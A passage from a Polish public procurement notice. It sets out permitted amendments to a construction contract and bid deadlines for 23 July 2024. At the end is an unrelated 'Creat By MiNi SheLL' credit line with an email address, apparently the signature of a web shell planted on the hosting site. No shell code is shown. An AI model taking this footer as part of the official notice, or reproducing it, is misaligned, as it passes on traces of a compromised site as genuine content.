Zamawiającego/ inspektora nadzoru inwestorskiego. Wstrzymanie robót budowlanych ze względu na warunki atmosferyczne typowe (właściwe) dla danej pory roku i miesiąca, lub zła organizacja robót nie uzasadniają zmiany terminu wykonania Umowy;<br/>c.	konieczności wykonania robót dodatkowych. Termin wykonania umowy ulega odpowiednio zmianie o okres trwania robót dodatkowych, jeżeli wykonanie tych robót warunkuje należyte wykonanie umowy. <br/>d.	wystąpienia działania osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia;<br/>e.	braku rozwiązań projektowych lub błędów w dokumentacji projektowej stwierdzonych w czasie trwania robót o czas niezbędny do ich uzupełnienia;<br/>przy czym zmiana terminu realizacji umowy wymaga każdorazowo aktualizacji harmonogram terminowo-rzeczowo-finansowego;<br/>b)	zmiany wysokości wynagrodzenia w następstwie zaistnienia konieczności wykonania robót dodatkowych, robót zamiennych lub potrzeby zaniechania niektórych robót w celu prawidłowej realizacji przedmiotu umowy.<br/>c)	wystąpienia zmiany technologii wykonania robót, pod warunkiem, że wprowadzone zmiany są korzystne dla Zamawiającego - w zakresie terminu, wynagrodzenia oraz zakresu robót;<br/>d)	odkrycia w toku prowadzenia robót, niezidentyfikowanych wcześniej urządzeń bądź nieznanych elementów zabytkowych mających obiektywny wpływ na terenie wykonania zamówienia - w zakresie terminu, wynagrodzenia oraz zakresu robót;<br/>e)	zmiany w określeniu stron umowy, o ile zasadność tej zmiany wynika z przepisów na skutek np. połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia.<br/>3.	Zmianie podlegają także wszelkie nieistotne postanowienia w stosunku do treści oferty, a także inne nieistotne zmiany, które nie stanowią istotnej zmiany umowy, w tym m.in.:<br/>a)	zmiana formy wniesionego zabezpieczenia należytego wykonania umowy na jedną lub kilka form, o których mowa w p.z.p. przy zachowaniu ciągłości zabezpieczenia i bez zmniejszania jego wysokości i zmiana ta nie wymaga zawarcia aneksu do umowy,<br/>b)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy, zamiana danych teleadresowych Wykonawcy lub Zamawiającego - zmiana ta następuje poprzez pisemne zgłoszenie tego faktu drugiej Stronie i nie wymaga zawarcia aneksu do umowy.<br/>Szczegóły opisano w §15 (zmiana umowy) projektu umowy, który stanowi załącznik nr 14 do SWZ - Projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać w terminie do dnia 23 lipca 2024 r. do godz. 10:00 za pośrednictwem Platformy e-Zamówienia, https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com